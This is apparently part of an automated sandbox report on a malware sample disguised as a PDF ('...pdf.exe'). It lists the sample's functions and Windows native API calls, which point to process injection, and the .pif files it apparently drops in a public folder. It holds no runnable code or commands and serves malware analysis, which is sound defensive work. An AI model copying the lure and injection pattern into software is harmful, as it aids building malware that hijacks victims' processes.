                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE79B4 NtAllocateVirtualMemory,0_2_02CE79B4
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE7D00 NtWriteVirtualMemory,0_2_02CE7D00
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_02CE8BAE
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CED9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,0_2_02CED9F0
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE79B2 NtAllocateVirtualMemory,0_2_02CE79B2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0042CB13 NtClose,5_2_0042CB13
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2B60 NtClose,LdrInitializeThunk,5_2_22AB2B60
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_22AB2C70
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_22AB2DF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB35C0 NtCreateMutant,LdrInitializeThunk,5_2_22AB35C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB4340 NtSetContextThread,5_2_22AB4340
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB4650 NtSuspendThread,5_2_22AB4650
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2AB0 NtWaitForSingleObject,5_2_22AB2AB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2AF0 NtWriteFile,5_2_22AB2AF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2AD0 NtReadFile,5_2_22AB2AD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2BA0 NtEnumerateValueKey,5_2_22AB2BA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2B80 NtQueryInformationFile,5_2_22AB2B80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2BE0 NtQueryValueKey,5_2_22AB2BE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2BF0 NtAllocateVirtualMemory,5_2_22AB2BF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2EA0 NtAdjustPrivilegesToken,5_2_22AB2EA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2E80 NtReadVirtualMemory,5_2_22AB2E80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2EE0 NtQueueApcThread,5_2_22AB2EE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2E30 NtWriteVirtualMemory,5_2_22AB2E30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2FA0 NtQuerySection,5_2_22AB2FA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2FB0 NtResumeThread,5_2_22AB2FB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2F90 NtProtectVirtualMemory,5_2_22AB2F90
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2FE0 NtCreateFile,5_2_22AB2FE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2F30 NtCreateSection,5_2_22AB2F30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2F60 NtCreateProcessEx,5_2_22AB2F60
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2CA0 NtQueryInformationToken,5_2_22AB2CA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2CF0 NtOpenProcess,5_2_22AB2CF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2CC0 NtQueryVirtualMemory,5_2_22AB2CC0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2C00 NtQueryInformationProcess,5_2_22AB2C00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2C60 NtCreateKey,5_2_22AB2C60
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2DB0 NtEnumerateKey,5_2_22AB2DB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2DD0 NtDelayExecution,5_2_22AB2DD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2D30 NtUnmapViewOfSection,5_2_22AB2D30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2D00 NtSetInformationFile,5_2_22AB2D00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB2D10 NtMapViewOfSection,5_2_22AB2D10
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB3090 NtSetValueKey,5_2_22AB3090
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB3010 NtOpenDirectoryObject,5_2_22AB3010
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB39B0 NtGetContextThread,5_2_22AB39B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB3D10 NtOpenProcessToken,5_2_22AB3D10
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB3D70 NtOpenThread,5_2_22AB3D70
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CC8254 NtReadVirtualMemory,9_2_02CC8254
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CC84C4 NtUnmapViewOfSection,9_2_02CC84C4
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CCDACC NtCreateFile,NtWriteFile,NtClose,9_2_02CCDACC
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CCDA44 NtDeleteFile,9_2_02CCDA44
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CC8BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,9_2_02CC8BB0
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CCDBB0 NtOpenFile,NtReadFile,NtClose,9_2_02CCDBB0
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CC79B4 NtAllocateVirtualMemory,9_2_02CC79B4
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CC7D00 NtWriteVirtualMemory,9_2_02CC7D00
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CC8BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,9_2_02CC8BAE
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CCD9F0 NtDeleteFile,9_2_02CCD9F0
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CC79B2 NtAllocateVirtualMemory,9_2_02CC79B2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC635C0 NtCreateMutant,LdrInitializeThunk,12_2_1CC635C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_1CC62C70
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_1CC62DF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62B60 NtClose,LdrInitializeThunk,12_2_1CC62B60
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC63D70 NtOpenThread,12_2_1CC63D70
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC63D10 NtOpenProcessToken,12_2_1CC63D10
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC639B0 NtGetContextThread,12_2_1CC639B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC63090 NtSetValueKey,12_2_1CC63090
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC63010 NtOpenDirectoryObject,12_2_1CC63010
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62CC0 NtQueryVirtualMemory,12_2_1CC62CC0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62CF0 NtOpenProcess,12_2_1CC62CF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62CA0 NtQueryInformationToken,12_2_1CC62CA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62C60 NtCreateKey,12_2_1CC62C60
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62C00 NtQueryInformationProcess,12_2_1CC62C00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62DD0 NtDelayExecution,12_2_1CC62DD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62DB0 NtEnumerateKey,12_2_1CC62DB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62D00 NtSetInformationFile,12_2_1CC62D00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62D10 NtMapViewOfSection,12_2_1CC62D10
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62D30 NtUnmapViewOfSection,12_2_1CC62D30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62EE0 NtQueueApcThread,12_2_1CC62EE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62E80 NtReadVirtualMemory,12_2_1CC62E80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62EA0 NtAdjustPrivilegesToken,12_2_1CC62EA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62E30 NtWriteVirtualMemory,12_2_1CC62E30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62FE0 NtCreateFile,12_2_1CC62FE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62F90 NtProtectVirtualMemory,12_2_1CC62F90
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62FA0 NtQuerySection,12_2_1CC62FA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62FB0 NtResumeThread,12_2_1CC62FB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62F60 NtCreateProcessEx,12_2_1CC62F60
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62F30 NtCreateSection,12_2_1CC62F30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62AD0 NtReadFile,12_2_1CC62AD0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62AF0 NtWriteFile,12_2_1CC62AF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62AB0 NtWaitForSingleObject,12_2_1CC62AB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62BE0 NtQueryValueKey,12_2_1CC62BE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62BF0 NtAllocateVirtualMemory,12_2_1CC62BF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62B80 NtQueryInformationFile,12_2_1CC62B80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC62BA0 NtEnumerateValueKey,12_2_1CC62BA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC64650 NtSuspendThread,12_2_1CC64650
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC64340 NtSetContextThread,12_2_1CC64340
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CE85DC CreateProcessAsUserW,0_2_02CE85DC
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CD20C40_2_02CD20C4
                      Source: C:\Users\user\Desktop\Delivery Confirmation Forms - Contact Form TS4047117 pdf.exeCode function: 0_2_02CDD57A0_2_02CDD57A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004028705_2_00402870
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004010E05_2_004010E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0042F1435_2_0042F143
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0040496A5_2_0040496A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004101D35_2_004101D3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004032305_2_00403230
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004012C05_2_004012C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0040E3CA5_2_0040E3CA
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0040E3D35_2_0040E3D3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004103F35_2_004103F3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_00416B9E5_2_00416B9E
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_00416BA35_2_00416BA3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0040E5185_2_0040E518
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_0040E5235_2_0040E523
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_004025B05_2_004025B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B002C05_2_22B002C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B202745_2_22B20274
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B403E65_2_22B403E6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8E3F05_2_22A8E3F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3A3525_2_22B3A352
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B120005_2_22B12000
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B401AA5_2_22B401AA
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B381CC5_2_22B381CC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A701005_2_22A70100
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1A1185_2_22B1A118
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B081585_2_22B08158
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9C6E05_2_22A9C6E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7C7C05_2_22A7C7C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A807705_2_22A80770
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA47505_2_22AA4750
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2E4F65_2_22B2E4F6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B244205_2_22B24420
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B324465_2_22B32446
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B405915_2_22B40591
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A805355_2_22A80535
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7EA805_2_22A7EA80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B36BD75_2_22B36BD7
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3AB405_2_22B3AB40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A668B85_2_22A668B8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AAE8F05_2_22AAE8F0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8A8405_2_22A8A840
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A828405_2_22A82840
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A829A05_2_22A829A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B4A9A65_2_22B4A9A6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A969625_2_22A96962
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3CE935_2_22B3CE93
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A92E905_2_22A92E90
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3EEDB5_2_22B3EEDB
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3EE265_2_22B3EE26
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80E595_2_22A80E59
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AFEFA05_2_22AFEFA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8CFE05_2_22A8CFE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A72FC85_2_22A72FC8
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B22F305_2_22B22F30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AC2F285_2_22AC2F28
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AA0F305_2_22AA0F30
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF4F405_2_22AF4F40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B20CB55_2_22B20CB5
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A70CF25_2_22A70CF2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A80C005_2_22A80C00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A98DBF5_2_22A98DBF
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A7ADE05_2_22A7ADE0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8AD005_2_22A8AD00
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1CD1F5_2_22B1CD1F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A852A05_2_22A852A0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B212ED5_2_22B212ED
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9B2C05_2_22A9B2C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AC739A5_2_22AC739A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3132D5_2_22B3132D
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6D34C5_2_22A6D34C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3F0E05_2_22B3F0E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B370E95_2_22B370E9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A870C05_2_22A870C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2F0CC5_2_22B2F0CC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A8B1B05_2_22A8B1B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AB516C5_2_22AB516C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A6F1725_2_22A6F172
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B4B16B5_2_22B4B16B
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B316CC5_2_22B316CC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3F7B05_2_22B3F7B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3F43F5_2_22B3F43F
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A714605_2_22A71460
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1D5B05_2_22B1D5B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B375715_2_22B37571
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AC5AA05_2_22AC5AA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B21AA35_2_22B21AA3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B1DAAC5_2_22B1DAAC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B2DAC65_2_22B2DAC6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF3A6C5_2_22AF3A6C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B37A465_2_22B37A46
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3FA495_2_22B3FA49
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9FB805_2_22A9FB80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22ABDBF95_2_22ABDBF9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF5BF05_2_22AF5BF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3FB765_2_22B3FB76
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A838E05_2_22A838E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AED8005_2_22AED800
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B159105_2_22B15910
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A899505_2_22A89950
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9B9505_2_22A9B950
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A89EB05_2_22A89EB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3FFB15_2_22B3FFB1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A81F925_2_22A81F92
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3FF095_2_22B3FF09
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B3FCF25_2_22B3FCF2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22AF9C325_2_22AF9C32
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A9FDC05_2_22A9FDC0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B37D735_2_22B37D73
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22A83D405_2_22A83D40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_2_22B31D5A5_2_22B31D5A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004015605_1_00401560
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004020585_1_00402058
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004010E05_1_004010E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004032305_1_00403230
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004012C05_1_004012C0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004033505_1_00403350
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004015535_1_00401553
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004025B05_1_004025B0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_004028705_1_00402870
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_00401D695_1_00401D69
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 5_1_00401D705_1_00401D70
                      Source: C:\Users\Public\Libraries\Cpbxcxnx.PIFCode function: 9_2_02CB20C49_2_02CB20C4
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEFCF212_2_1CCEFCF2
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCA9C3212_2_1CCA9C32
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC4FDC012_2_1CC4FDC0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC33D4012_2_1CC33D40
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE1D5A12_2_1CCE1D5A
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE7D7312_2_1CCE7D73
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC39EB012_2_1CC39EB0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC31F9212_2_1CC31F92
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEFFB112_2_1CCEFFB1
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEFF0912_2_1CCEFF09
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC338E012_2_1CC338E0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC9D80012_2_1CC9D800
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC3995012_2_1CC39950
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC4B95012_2_1CC4B950
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCC591012_2_1CCC5910
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCDDAC612_2_1CCDDAC6
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCCDAAC12_2_1CCCDAAC
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC75AA012_2_1CC75AA0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCD1AA312_2_1CCD1AA3
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEFA4912_2_1CCEFA49
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCE7A4612_2_1CCE7A46
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCA3A6C12_2_1CCA3A6C
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCA5BF012_2_1CCA5BF0
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC6DBF912_2_1CC6DBF9
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CC4FB8012_2_1CC4FB80
                      Source: C:\Users\Public\Libraries\xnxcxbpC.pifCode function: 12_2_1CCEFB7612_2_1CCEFB76
